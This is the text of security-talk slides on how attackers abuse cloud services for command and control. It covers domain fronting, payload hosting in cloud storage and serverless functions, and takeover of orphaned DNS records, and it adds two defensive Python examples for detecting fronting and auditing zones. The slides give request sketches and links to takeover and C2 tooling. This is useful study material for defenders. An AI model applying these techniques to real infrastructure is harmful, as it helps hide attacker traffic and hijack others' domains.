▪ How can we represent ownership?
▪ How do we prevent misconfiguration?
[ abuse - fronting ]
Normal request for http://kittens.com/index.html through the CDN:
[DNS] kittens.azureedge.net : 1.2.3.4
[DNS] kittens.com : kittens.azureedge.net
[TLS] I’m looking for kittens.com
GET /index.html
Host: kittens.azureedge.net
(sent to 1.2.3.4)
Normal request for http://puppies.com/index.html through the same CDN:
[DNS] puppies.azureedge.net : 1.2.3.4
[DNS] puppies.com : puppies.azureedge.net
[TLS] I’m looking for puppies.com
GET /index.html
Host: puppies.azureedge.net
(sent to 1.2.3.4)
Fronted request: DNS and the web logs only show kittens.com, while the Host header selects puppies.azureedge.net at the shared edge:
[DNS] kittens.com : 1.2.3.4
GET /index.html
Host: puppies.azureedge.net
Web Logs: kittens.com
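Detection-side view of the exchange above, as an added example that is not part of the talk: it reads constructed proxy log lines carrying both the TLS SNI and the HTTP Host header, follows the expected CNAME chain for the SNI (a constructed map here; passive DNS or a live lookup in practice), and flags requests whose Host header names something DNS does not explain. The log format, hostnames and CNAME map are assumptions.

```python
"""Domain-fronting detection over proxy logs (added example, not the talk's code).
Assumes a TLS-terminating proxy that logs both the TLS SNI the client asked for
and the HTTP Host header it sent inside the tunnel; format and lines are constructed."""
import re
from typing import Dict, Iterator, List, Set

# Constructed sample log: timestamp, client, sni=, host=, request line.
SAMPLE_LOG = """\
2019-08-07T10:00:01Z 10.0.0.5 sni=kittens.com host=kittens.azureedge.net "GET /index.html"
2019-08-07T10:00:02Z 10.0.0.5 sni=kittens.com host=puppies.azureedge.net "GET /index.html"
2019-08-07T10:00:03Z 10.0.0.9 sni=www.example.net host=www.example.net:443 "GET /"
2019-08-07T10:00:04Z 10.0.0.9 sni=puppies.com host=PUPPIES.azureedge.net. "GET /a"
"""
# Constructed zone view: what each front-end name CNAMEs to (from passive DNS
# or a live lookup of the SNI in production).
CNAME_CHAIN: Dict[str, str] = {
    "kittens.com": "kittens.azureedge.net",
    "puppies.com": "puppies.azureedge.net",
}
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) sni=(?P<sni>\S+) host=(?P<host>\S+) "(?P<req>[^"]*)"$'
)

def norm(name: str) -> str:
    """Lower-case, drop any :port and a trailing dot so names compare cleanly."""
    return name.lower().split(":")[0].rstrip(".")

def parse(log: str) -> Iterator[dict]:
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()

def expected_hosts(sni: str, chain: Dict[str, str], max_hops: int = 8) -> Set[str]:
    """The SNI itself plus every name it legitimately CNAMEs to."""
    names, cur = {sni}, sni
    for _ in range(max_hops):  # hop limit guards against CNAME loops
        cur = norm(chain.get(cur, ""))
        if not cur or cur in names:
            break
        names.add(cur)
    return names

def find_fronting(log: str, chain: Dict[str, str]) -> List[dict]:
    """Records whose Host header is neither the SNI nor a CNAME target of it.
    The CDN serves whatever origin the Host header names, so an SNI/Host split
    that DNS does not explain is the fronting pattern from the slides."""
    hits = []
    for rec in parse(log):
        sni, host = norm(rec["sni"]), norm(rec["host"])
        if host not in expected_hosts(sni, chain):
            hits.append(rec)
    return hits
```

Only the second line is flagged: the port suffix and the upper-case, dot-terminated Host values are normalised away, and kittens.com's own CNAME target is accepted.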
[ abuse - file hosting ]
▪ Hosting static payloads in containers1
▪ Shoveling dynamic data via containers2
▪ AWS - S3 Buckets
https://s3.amazonaws.com/[bucket]/[object]
https://[bucket].s3.amazonaws.com/[object]
▪ Azure - Blob Storage
https://[account].blob.core.windows.net/[container]/[object]?...
▪ GCP - Cloud Storage
https://storage.googleapis.com/[bucket]/[object]
https://[bucket].storage.googleapis.com/[object]
1 https://pentestarmoury.com/2017/07/19/s3-buckets-for-good-and-evil/
2 https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/
[ abuse - serverless code ]
▪ Pass-through traffic redirection1
▪ Hosted C2 server2
▪ AWS - Lambda
http://[id].execute-api.[region].amazonaws.com/[function]
▪ Azure - Functions
http://[app].azurewebsites.net/api/[function]?code=[key]
▪ GCP - App Engine
http://[app].appspot.com/[function]
1 https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/
2 https://github.com/aws/chalice
[ takeover primitives ]
DNS vs Dynamic Stuff
▪ Orphaned records are common
▪ Prior research in the area:
▪ Analysis of DNS in CyberSecurity1
▪ AWS Route53 nameserver takeover2
▪ 3rd party object re-collection3
▪ Practical guide to subdomain takeover4
▪ The Orphaned Internet: Taking over 120k domains5
1 https://is.muni.cz/th/byrdn/Thesis.pdf
2 https://0xpatrik.com/subdomain-takeover-ns/
3 https://github.com/EdOverflow/can-i-take-over-xyz
4 https://www.exploit-db.com/docs/46415
5 https://bit.ly/2ggHlzn
[ takeover primitives ]
▪ Two primary schools of thought:
1. Go after CNAME records
2. Go after NS records
▪ What about others?
▪ Can we target IP-based records?
“How quickly could we collect new addresses?”
“How would we accurately check for an orphan record?”
[ ip hunting concept ]
Participants: Attacker, DaCloud
1. Collect a random IP
2. Query DNS repository for associated records
3. Keep the address for use
4. Repeat ?
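An added example (not the talk's cloud racoon tooling) that takes the takeover primitives and the IP-hunting concept above from the defender's side: it audits a zone export for CNAME or NS targets that no longer exist and for A records pointing into a cloud range the asset inventory no longer holds. The zone records, resolver answers, provider prefixes and inventory are all constructed placeholders.

```python
"""Orphaned-record audit for a zone you own (added example, not the talk's tooling).
Answers the slides' question of how to check accurately for an orphan record from
the defender's side: records, resolver and IP inventory are injected, and every
value below is constructed placeholder data."""
import ipaddress
from typing import Callable, Dict, Iterable, List, Optional, Set, Tuple

Record = Tuple[str, str, str]  # (owner name, type, value)
# (name, rtype) -> answers, or None when the name does not exist (NXDOMAIN)
Resolver = Callable[[str, str], Optional[List[str]]]

# Placeholder provider ranges (documentation prefixes); real ones come from
# each provider's published IP-range feed.
CLOUD_PREFIXES = {
    "cloud-a-placeholder": ipaddress.ip_network("203.0.113.0/24"),
    "cloud-b-placeholder": ipaddress.ip_network("198.51.100.0/24"),
}
# Constructed zone export.
SAMPLE_ZONE: List[Record] = [
    ("www.example.com.", "A", "192.0.2.10"),
    ("files.example.com.", "CNAME", "files-old.storage-placeholder.example."),
    ("blog.example.com.", "CNAME", "blog.cdn-placeholder.example."),
    ("dev.example.com.", "A", "203.0.113.45"),
    ("api.example.com.", "A", "203.0.113.7"),
    ("sub.example.com.", "NS", "ns1.nowhere-placeholder.example."),
]
# Constructed resolver state: only blog's CDN target still exists.
FAKE_ANSWERS = {"blog.cdn-placeholder.example": ["198.51.100.9"]}
# Cloud addresses the asset inventory says we still hold.
OWNED_IPS: Set[str] = {"203.0.113.7"}

def fake_resolve(name: str, rtype: str) -> Optional[List[str]]:
    return FAKE_ANSWERS.get(name)

def cloud_provider(ip: str) -> Optional[str]:
    addr = ipaddress.ip_address(ip)
    return next((p for p, net in CLOUD_PREFIXES.items() if addr in net), None)

def audit_zone(records: Iterable[Record], resolve: Resolver,
               owned: Set[str]) -> List[Dict[str, str]]:
    """Flag CNAME/NS targets that no longer exist and A records pointing into a
    cloud range we do not (or no longer) hold. A missing target is the precondition
    for the takeovers listed above; whether a new tenant can claim it is per-provider."""
    findings = []
    for name, rtype, value in records:
        if rtype in ("CNAME", "NS") and resolve(value.rstrip("."), "A") is None:
            findings.append({"name": name, "type": rtype, "value": value,
                             "reason": f"{rtype} target does not resolve"})
        elif rtype == "A":
            provider = cloud_provider(value)
            if provider and value not in owned:
                findings.append({"name": name, "type": rtype, "value": value,
                                 "reason": f"{provider} address not in inventory"})
    return findings
```

Run against the constructed zone it reports files (dangling CNAME), dev (released cloud address) and sub (delegation to a nameserver that no longer exists), while www, blog and api pass.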
[ record sets ]
▪ PTR Records ?
▪ Rapid7 OpenDNS1
▪ Verisign Top Level Zone File2
▪ WhoisXMLAPI Database3
▪ SecurityTrails4
1 https://opendata.rapid7.com/
2 https://www.verisign.com/en_US/channel-resources/domain-registry-products/zone-file/index.xhtml
3 https://dns-database-download.whoisxmlapi.com/
4 https://securitytrails.com/corp/pricing
[ poc - cloud racoon ]
▪ Hunts for IPs linked to orphaned DNS records
▪ Uses cloud APIs for fast cycling
▪ Lookup is performed via SecurityTrails
▪ Tooling available for AWS, Azure, and GCP
Cloud IP Hunting - Proof of Concept
[ poc - cloud racoon ]
[ insert demo here ]
final thoughts
[ key points ]
▪ C2 is a very complex discipline
▪ Implementations vary greatly
▪ Any particular design is rarely random
▪ Lots of public information is already available
▪ None of this is “theoretical” anymore
▪ We need to start solving these new problems
▪ 3rd party abuse is growing
▪ Cloud represents very unique challenges
[ what wasn’t covered ]
▪ Offensive Infrastructure
▪ Asset collection and security
▪ Traffic redirection
▪ Stage segmentation
▪ Architecture Details
▪ Integrating code with a C2 methodology
▪ Encoding or encryption details
▪ Language selection or framework limitation
▪ Implementation Costs
[ additional resources ]
▪ MITRE Tactics https://attack.mitre.org/tactics/TA0011/
▪ Azeria Labs https://azeria-labs.com/command-and-control/
▪ RTI Wiki https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
▪ Domain Fronting Lists https://github.com/vysec/DomainFrontingLists
[ additional resources ]
▪ Subdomain Takeover Tooling
https://github.com/haccer/subjac
https://github.com/antichown/subdomain-takeover
https://github.com/SaadAhmedx/Subdomain-Takeover
https://github.com/LukaSikic/subzy
https://github.com/samhaxr/TakeOver-v1
▪ scanio.sh for takeover searching https://gist.github.com/haccer/3698ff6927fc00c8fe533fc977f850f8
[ finish ]
Thank you for coming!
@monoxgas
https://github.com/monoxgas/ (soon)
Questions?